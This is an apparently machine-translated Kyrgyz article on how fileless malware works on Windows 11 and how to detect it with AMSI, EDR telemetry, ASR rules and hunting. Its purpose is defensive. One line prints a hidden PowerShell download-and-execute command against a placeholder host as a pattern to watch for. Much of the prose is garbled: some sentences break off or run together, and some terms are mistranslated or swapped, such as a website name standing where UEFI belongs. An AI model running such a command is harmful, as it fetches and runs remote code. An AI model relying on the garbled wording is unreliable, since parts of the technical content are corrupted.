Windows 11де кооптуу файлсыз кесепеттүү программаны кантип аныктоого болот

¿Кооптуу файлсыз кесепеттүү программаны кантип аныктоого болот? Файлсыз чабуул активдүүлүгү кыйла өстү жана маселени ого бетер начарлатууга, Windows 11 иммунитетке ээ эмесБул ыкма дискти айланып өтүп, эстутумга жана мыйзамдуу тутум куралдарына таянат; ошондуктан кол тамгага негизделген антивирустук программалар күрөшүп жатат. Эгер сиз аны аныктоонун ишенимдүү жолун издеп жатсаңыз, жооп айкалыштырууда телеметрия, жүрүм-турум анализи жана Windows башкаруу.

Учурдагы экосистемада PowerShell, WMI же Mshtaны кыянаттык менен пайдаланган кампаниялар эстутум инъекциялары, дискке "тийбестен" туруктуулук жана жада калса татаалыраак ыкмалар менен бирге жашашат. микропрограмманы бузууларНегизгиси - коркунуч картасын, чабуул этаптарын жана RAM ичинде бардыгы болуп жатканда алар кандай сигналдарды калтырарын түшүнүү.

Файлсыз кесепеттүү программа деген эмне жана ал эмне үчүн Windows 11де тынчсыздандырат?

Биз "файлсыз" коркунучтар жөнүндө сөз кылганда, биз зыяндуу кодду айтып жатабыз Жаңы аткарылуучу файлдарды сактоонун кереги жок файл системасында иштөө үчүн. Ал, адатта, иштеп жаткан процесстерге киргизилет жана Microsoft тарабынан кол коюлган котормочуларга жана бинардык файлдарга таянуу менен RAMда аткарылат (мисалы, PowerShell, WMI, rundll32, mshtaБул сиздин изиңизди азайтат жана шектүү файлдарды гана издеген кыймылдаткычтарды айланып өтүүгө мүмкүндүк берет.

Атүгүл офис документтери же PDF файлдары да, буйруктарды ишке киргизүү үчүн алсыздыктардан пайдаланып, феномендин бир бөлүгү болуп эсептелет, анткени эстутумда аткарууну активдештирүү талдоо үчүн пайдалуу бинарларды калтырбастан. кыянаттык менен пайдалануу макрос жана DDE Officeте, анткени код WinWord сыяктуу мыйзамдуу процесстерде иштейт.

Чабуулчулар социалдык инженерияны (фишинг, спам шилтемелери) техникалык тузактар ​​менен айкалыштырат: колдонуучунун чыкылдатуусу скрипт жүктөлүп алынып, эстутумдагы акыркы пайдалуу жүктү аткара турган чынжырды баштайт, из калтырбоо дискте. Максаттары маалыматтарды уурдоодон ransomware аткарууга чейин, унчукпай каптал кыймылга чейин.

Системадагы изи боюнча типологиялар: "тазадан" гибриддерге чейин

Түшүнүктөрдү чаташтырбоо үчүн, коркунучтарды файл системасы менен өз ара аракеттенүү даражасы боюнча бөлүү пайдалуу. Бул классификация тактайт эмне сакталат, код кайда жашайт жана ал кандай белгилерди калтырат?.

I түрү: файл аракети жок

Толугу менен файлсыз зыяндуу программа дискке эч нерсе жазбайт. Классикалык мисал - а тармактын аялуулугу (Күндүзгү EternalBlue вектору сыяктуу) ядронун эс тутумунда жайгашкан бэкдорду ишке ашыруу үчүн (DoublePulsar сыяктуу учурлар). Бул жерде бардыгы RAMда болот жана файл тутумунда артефакттар жок.

Дагы бир вариант - булгануу камтылган компоненттеринин саны: BIOS/UEFI, тармак адаптерлери, USB перифериялык түзүлүштөр (BadUSB тибиндеги техникалар) же ал тургай CPU подсистемалары. Алар кайра күйгүзүү жана кайра орнотуулар аркылуу уланат, бул кошумча кыйынчылык менен Бир нече продуктылар микропрограмманы текшеретБул татаал чабуулдар, сейрек кездешет, бирок алардын жашыруун жана туруктуулугунан улам коркунучтуу.

II түрү: Кыйыр архивдөө иши

Бул жерде кесепеттүү программа өзүнүн аткарылуучусун "кетпейт", бирок негизинен файлдар катары сакталган система тарабынан башкарылуучу контейнерлерди колдонот. Мисалы, бул өсүмдүктүн арткы эшиктери powershell буйруктары WMI репозиторийинде жана анын аткарылышын окуя чыпкалары менен иштетиңиз. Аны экилик файлдарды таштабастан буйрук сабынан орнотууга болот, бирок WMI репозиторий дискте мыйзамдуу маалымат базасы катары жайгашып, системага таасирин тийгизбестен тазалоону кыйындатат.

Практикалык көз караштан алганда, алар файлсыз деп эсептелет, анткени ал контейнер (WMI, Реестр ж. Бул классикалык аныкталуучу аткарылуучу эмес Жана аны тазалоо анча деле маанилүү эмес. Натыйжа: бир аз "салттуу" изи менен жашыруун өжөрлүк.

III түрү: иштеши үчүн файлдарды талап кылат

Кээ бир учурларда а "файлсыз" туруктуулук Логикалык деңгээлде аларга файлга негизделген триггер керек. Кадимки мисал Ковтер: ал кокустук узартуу үчүн кабык этишти каттайт; ошол кеңейтүү менен файл ачылганда, mshta.exe колдонуучу кичинекей скрипт ишке киргизилет, ал реестрден зыяндуу сапты калыбына келтирет.

Кокусунан кеңейтилген бул "жем" файлдары талдануучу пайдалуу жүктү камтыбайт жана коддун негизги бөлүгү регистрация (башка контейнер). Ошондуктан алар триггер катары бир же бир нече диск артефакттарына көз каранды болсо да, таасири боюнча файлсыз категорияга бөлүнөт.

Инфекциянын векторлору жана "хосттору": ал кайда кирет жана кайда жашырат

Аныктоону жакшыртуу үчүн инфекциянын кире турган жерин жана ээсин картага түшүрүү абдан маанилүү. Бул көз караш дизайнга жардам берет конкреттүү башкаруу Тиешелүү телеметрияга артыкчылык бериңиз.

эрдик

• Файлга негизделген (III түрү): Документтер, аткарылуучу файлдар, эски Flash/Java файлдары же LNK файлдары браузерди же аларды иштеткен кыймылдаткычты колдонуп, кабык кодун эстутумга жүктөй алат. Биринчи вектор файл, бирок пайдалуу жүк RAMга барат.
• Тармакка негизделген (Тип I): Абалды пайдаланган пакет (мисалы, SMBда) колдонуучу жеринде же ядродо аткарылууга жетишет. WannaCry бул ыкманы популярдуу кылган. Түздөн-түз эс жүктөө жаңы файлсыз.

Hardware

• түзмөктөр (I түрү): Диск же тармак картасынын микропрограммасы өзгөртүлүп, код киргизилиши мүмкүн. Текшерүү кыйын жана ОСтун сыртында сакталат.
• CPU жана башкаруу подсистемалары (I түрү): Intelдин ME/AMT сыяктуу технологиялары Тармактарды түзүү жана OS сыртында аткарууАл өтө төмөн деңгээлде, жогорку потенциалдуу жашыруундук менен кол салат.
• USB (I түрү): BadUSB клавиатуранын же NICтин кейпин кийүү жана буйруктарды ишке киргизүү же трафикти кайра багыттоо үчүн USB дискти кайра программалоого мүмкүндүк берет.
• BIOS / .ktrk.kg сайты (Тип I): Windows башталганга чейин иштеген зыяндуу микропрограмманы кайра программалоо (Mebromi сыяктуу учурлар).
• Hypervisor (I түрү): OS астындагы мини-гипервизорду ишке ашыруу, анын бар экенин жашыруу. Сейрек, бирок буга чейин гипервизордук руткиттер түрүндө байкалган.

Аткаруу жана инъекция

• Файлга негизделген (III түрү): EXE/DLL/LNK же мыйзамдуу процесстерге саймаларды ишке киргизген пландаштырылган тапшырмалар.
• Macros (III түрү): Office in VBA алдоо жолу менен колдонуучунун макулдугу менен пайдалуу жүктөрдү, анын ичинде толук ransomware программасын чечмелеп жана аткара алат.
• Кол жазмалар (II түрү): PowerShell, VBScript же файлдан JScript, буйрук сабы, кызматтар, Каттоо же WMIЧабуулчу скриптти дискке тийбестен алыскы сессияда тере алат.
• Жүктөө жазуусу (MBR/Жүктөө) (II түрү): Петя сыяктуу үй-бүлөлөр ишке киргизүүдө башкарууну колго алуу үчүн жүктөө секторунун үстүнөн жазышат. Ал файл тутумунан тышкары, бирок аны калыбына келтире турган OS жана заманбап чечимдер үчүн жеткиликтүү.

Файлсыз чабуулдар кантип иштейт: фазалар жана сигналдар

Алар аткарылуучу файлдарды калтырбаса да, кампаниялар этап-этабы менен логикага ылайык келет. Аларды түшүнүү мониторинг жүргүзүүгө мүмкүндүк берет. окуялар жана процесстер ортосундагы мамилелер ошол из калтырат.

• Алгачкы мүмкүнчүлүкШилтемелерди же тиркемелерди, бузулган веб-сайттарды же уурдалган эсептик дайындарды колдонуу менен фишингдик чабуулдар. Көптөгөн чынжырлар буйрукту ишке киргизген Office документинен башталат PowerShell.
• Туруктуулук: WMI аркылуу бэкдор (фильтрлер жана жазылуулар), Реестрди аткаруу ачкычтары же жаңы зыяндуу файлсыз скрипттерди кайра ишке киргизген пландаштырылган тапшырмалар.
• ЭксфильтрацияМаалымат чогултулгандан кийин, трафикти аралаштыруу үчүн ишенимдүү процесстер (браузерлер, PowerShell, bitsadmin) аркылуу тармактан жөнөтүлөт.

Бул үлгү өзгөчө тымызын, анткени чабуул көрсөткүчтөрү Алар кадыреселикте жашынып калышат: буйрук сабынын аргументтери, процесстин чынжырчасы, аномалдуу чыгыш байланыштары же инъекциялык API'лерге жетүү.

Жалпы ыкмалар: эс тутумдан жаздырууга чейин

актёрлор бир катар таянышат ыкмалары жашыруундукту оптималдаштыруу. Натыйжалуу аныктоону активдештирүү үчүн эң кеңири тарагандарды билүү пайдалуу.

• Эсте калган резидент: Активдештирүүнү күткөн ишенимдүү процесстин мейкиндигине пайдалуу жүктөрдү жүктөө. руткиттер жана илгичтер Өзөктө алар жашыруу деңгээлин көтөрүшөт.
• Реестрдеги туруктуулукШифрленген блоблорду ачкычтарга сактап, аларды мыйзамдуу ишке киргизгичтен (mshta, rundll32, wscript) регидратациялоо. Эфемердик орнотуучу өзүнүн изин азайтуу үчүн өзүн-өзү жок кыла алат.
• Эсептик маалымат фишингУурдалган колдонуучу аттарды жана сырсөздөрдү колдонуу менен, чабуулчу алыскы снаряддарды жана өсүмдүктөрдү ишке ашырат унчукпай жетүү Реестрде же WMIде.
• 'Fileless' RansomwareШифрлөө жана C2 байланышы оперативдүү эс тутумдан уюштурулуп, зыян көрүнгөнчө аныктоо мүмкүнчүлүктөрүн азайтат.
• Операциялык комплекттер: аялууларды аныктаган жана колдонуучу чыкылдаткандан кийин эстутумда гана пайдалуу жүктөрдү жайгаштырган автоматташтырылган чынжырлар.
• Коду бар документтер: аткарылуучу файлдарды дискке сактабастан буйруктарды иштеткен DDE сыяктуу макростор жана механизмдер.

Тармактык изилдөөлөр буга чейин көрүнүктүү чокуларды көрсөттү: 2018-жылдын бир мезгилинде, а 90% ашуун жогорулатуу скриптке негизделген жана PowerShell чынжыр чабуулдарында, вектор анын натыйжалуулугу үчүн артыкчылыктуу экендигинин белгиси.

Компаниялар жана жеткирүүчүлөр үчүн көйгөй: эмне үчүн бөгөт коюу жетишсиз

Бул PowerShell өчүрүү же түбөлүккө макрос тыюу азгырык болмок, бирок Операцияны бузмаксыңPowerShell - заманбап башкаруунун түркүгү жана Office бизнесте абдан маанилүү; сокур бөгөт коюу көп учурда мүмкүн эмес.

Андан тышкары, негизги башкаруу элементтерин айланып өтүүнүн жолдору бар: PowerShellди DLL жана rundll32 аркылуу иштетүү, скрипттерди EXEге таңгактоо, PowerShell'дин өзүңүздүн көчүрмөсүн алып келиңиз же ал тургай сүрөттөрдөгү скрипттерди жашырып, аларды эс тутумга чыгарып салыңыз. Демек, коргонуу куралдарынын бар экенин танууга гана негизделиши мүмкүн эмес.

Дагы бир кеңири таралган ката - бүт чечимди булутка өткөрүп берүү: эгерде агент серверден жооп күтүшү керек болсо, Сиз реалдуу убакытта алдын алуудан айрыласызМаалыматты байытуу үчүн телеметриялык маалыматтар жүктөлүшү мүмкүн, бирок Жумшатуу акыркы чекитте болушу керек.

Windows 11де файлсыз зыяндуу программаларды кантип аныктоого болот: телеметрия жана жүрүм-турум

Жеңүүчү стратегия болуп саналат процесстерге жана эс тутумга мониторинг жүргүзүүФайлдар эмес. Зыяндуу жүрүм-турумдар файл алган формаларга караганда туруктуураак, бул аларды алдын алуу кыймылдаткычтары үчүн идеалдуу кылат.

• AMSI (Антивирустук сканерлөө интерфейси)Ал PowerShell, VBScript же JScript скрипттерин эстутумда динамикалык түрдө курулса да кармап калат. Аткаруу алдында бүдөмүк саптарды тартуу үчүн эң сонун.
• Процесске мониторинг: баштоо/аяктоо, PID, ата-энелер жана балдар, маршруттар, буйрук саптары жана хэштер, плюс толук окуяны түшүнүү үчүн аткаруу дарактары.
• Эстутум анализи: инъекцияларды, чагылдыруучу же PE жүктөрдү дискке тийбестен аныктоо жана адаттан тыш аткарылуучу аймактарды карап чыгуу.
• Стартер секторун коргоо: бурмаланган учурда MBR/EFIди көзөмөлдөө жана калыбына келтирүү.

Microsoft экосистемасында Defender for Endpoint AMSIди бириктирет, жүрүм-турумуна мониторинг жүргүзүүЭстутумду сканерлөө жана булутка негизделген машинаны үйрөнүү жаңы же бүдөмүк варианттарга каршы аныктоону масштабдоо үчүн колдонулат. Башка сатуучулар ядро ​​​​резиденттик кыймылдаткычтары менен окшош ыкмаларды колдонушат.

Корреляциянын реалдуу мисалы: документтен PowerShellге

Outlook тиркемени жүктөй турган, Word документти ачкан, активдүү мазмун иштетилген жана PowerShell шектүү параметрлер менен ишке киргизилген чынжырды элестетиңиз. Туура телеметрия көрсөтөт Буйрук сабы (мис., ExecutionPolicy Bypass, жашыруун терезе), ишенимсиз доменге туташуу жана AppData ичинде өзүн орнотуучу бала процессин түзүү.

Жергиликтүү контекстке ээ агент жөндөмдүү токтотуу жана артка SIEM же электрондук почта/SMS аркылуу кабарлоодон тышкары, кол менен кийлигишүүсүз зыяндуу аракеттер. Кээ бир өнүмдөр көрүнөө процесске (Outlook/Word) эмес, негизги себеп атрибуция катмарын (StoryLine тибиндеги моделдер) кошот. толук зыяндуу жип жана анын келип чыгышы системаны комплекстүү тазалоо үчүн.

Байкоо керек болгон типтүү буйрук үлгүсү төмөнкүдөй болушу мүмкүн: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Логика так сап эмес, бирок сигналдардын жыйындысы: саясатты айланып өтүү, жашыруун терезе, так жүктөө жана эстутумда аткаруу.

AMSI, куур жана ар бир актердун ролу: акыркы чекиттен SOCка чейин

Сценарийди тартуудан тышкары, күчтүү архитектура иликтөөнү жана жооп кайтарууну жеңилдеткен кадамдарды уюштурат. Жүктү аткаруудан мурун канчалык көп далилдер болсо, ошончолук жакшы., мыкты.

• Сценарийди кармооAMSI кесепеттүү программа түтүкчөсүндөгү статикалык жана динамикалык талдоо үчүн мазмунду (ал тез арада түзүлсө да) жеткирет.
• Окуяларды иштетүүPID, бинардык, хэштер, маршруттар жана башка маалыматтар чогултулат. аргументтер, акыркы жүктү алып жараян дарактарды түзүү.
• Аныктоо жана отчеттуулукТабылгандар продукт консолунда көрсөтүлүп, өнөктүктү визуалдаштыруу үчүн тармактык платформаларга (NDR) жөнөтүлөт.
• Колдонуучунун кепилдиктериСкрипт эстутумга сайылган күндө да, алкак AMSI аны кармап турат Windowsтун шайкеш версияларында.
• Администратордун мүмкүнчүлүктөрү: скрипт текшерүүсүн иштетүү үчүн саясат конфигурациясы, жүрүм-турумга негизделген бөгөт коюу жана консолдон отчетторду түзүү.
• SOC иши: тарыхты кайра түзүү жана артефакттарды чыгаруу (VM UUID, OS версиясы, скрипт түрү, демилгечи процесс жана анын ата-энеси, хэштер жана буйрук саптары) көтөрүү эрежелери келечек.

Платформа экспорттоого уруксат бергенде эс буфери Аткаруу менен байланышкан изилдөөчүлөр жаңы аныктоолорду жаратып, окшош варианттардан коргонууну байыта алышат.

Windows 11де практикалык чаралар: алдын алуу жана аңчылык

Эстутум текшерүүсү жана AMSI менен EDRден тышкары, Windows 11 чабуул мейкиндиктерин жабууга жана көрүүнү жакшыртууга мүмкүндүк берет. жергиликтүү башкаруу.

• PowerShellде каттоо жана чектөөлөрСкрипт блогун жана модулдук журналды иштетет, мүмкүн болсо чектелген режимдерди колдонот жана колдонууну көзөмөлдөйт Айланып өтүү/Жашыруун.
• Чабуул беттерин кыскартуу (ASR) эрежелери: Office процесстери тарабынан скрипт ишке киргизүүнү бөгөттөйт жана WMI кыянаттык/PSExec керек эмес болгондо.
• Office макро саясаттары: демейки боюнча, ички макро кол коюуну жана катуу ишеним тизмелерин өчүрөт; эски DDE агымдарын көзөмөлдөйт.
• WMI аудит жана реестри: окуяларга жазылууларды жана автоматтык аткаруу ачкычтарын (Run, RunOnce, Winlogon), ошондой эле тапшырма түзүүнү көзөмөлдөйт пландаштырылган.
• Баштоо коргоо: Secure Boot иштетет, MBR/EFI бүтүндүгүн текшерет жана ишке киргизүүдө эч кандай өзгөртүүлөр жок экенин ырастайт.
• Жамалоо жана катуулоо: браузерлерде, Office компоненттеринде жана тармактык кызматтарда колдонулуучу кемчиликтерди жабат.
• маалымдуулук: колдонуучуларды жана техникалык топторду фишингге жана сигналдарга үйрөтөт жашыруун жазалоо.

Аңчылык үчүн, төмөнкү суроолорго көңүл буруңуз: Office тарабынан PowerShell/MSHTA боюнча процесстерди түзүү, аргумент менен жүктөө сап/жүктөө файлыТак бүдөмүктүү скрипттер, чагылдыруучу инъекциялар жана шектүү TLDдерге чыгуучу тармактар. Чууну азайтуу үчүн бул сигналдарды репутация жана жыштык менен кайчылаш шилтеме.

Ар бир кыймылдаткыч бүгүн эмнени аныктай алат?

Майкрософттун ишкана чечимдери AMSI, жүрүм-турум аналитикасын, эс текшерүү жана жүктөө секторун коргоо, ошондой эле пайда болгон коркунучтарга каршы масштабдуу булуттагы ML моделдери. Башка сатуучулар өзгөрүүлөрдү автоматтык түрдө артка кайтаруу менен зыяндуу программаларды зыяндуу программалардан айырмалоо үчүн ядро ​​деңгээлинде мониторинг жүргүзүшөт.

негизделген мамиле аткаруу окуялары Ал негизги себебин аныктоого (мисалы, чынжырды козгогон Outlook тиркемеси) жана бүт даракты жумшартууга мүмкүндүк берет: скрипттер, ачкычтар, тапшырмалар жана аралык бинарлар, көрүнгөн симптомго тыгылып калбоо менен.

Жалпы каталар жана алардан кантип сактануу керек

Альтернативдүү башкаруу планы жок PowerShellди бөгөттөө практикалык эмес гана эмес, ошондой эле бар аны кыйыр түрдө чакыруу жолдоруОшол эле макросторго да тиешелүү: же сиз аларды саясаттар жана кол коюулар менен башкарасыз, же бизнес зыян тартат. Телеметрияга жана жүрүм-турум эрежелерине көңүл бурганыңыз жакшы.

Дагы бир кеңири таралган жаңылыштык - ак тизмедеги тиркемелер баарын чечет деп ишенүү: файлсыз технология дал ушуга таянат. ишенимдүү колдонмолорКонтролдоо алардын эмне кылып жатканын жана кандай байланышы бар экенине эле эмес, уруксат берилгендигине да көз салышы керек.

Жогоруда айтылгандардын бардыгы менен файлсыз кесепеттүү программа сиз чындап эмне маанилүү экенин көзөмөлдөгөндө "арбак" болбой калат: жүрүм-туруму, эс тутуму жана келип чыгышы ар бир аткарылышынын. AMSI, бай процесстик телеметрия, жергиликтүү Windows 11 башкаруу элементтери жана жүрүм-турум анализи менен EDR катмары сизге артыкчылык берет. Теңдемеге макрос жана PowerShell, WMI/Registry аудити жана буйрук саптарына жана процесс дарактарына артыкчылык берген аңчылык үчүн реалдуу саясаттарды кошуңуз жана сизде бул чынжырлар үн чыгара электе кесип салган коргоо бар.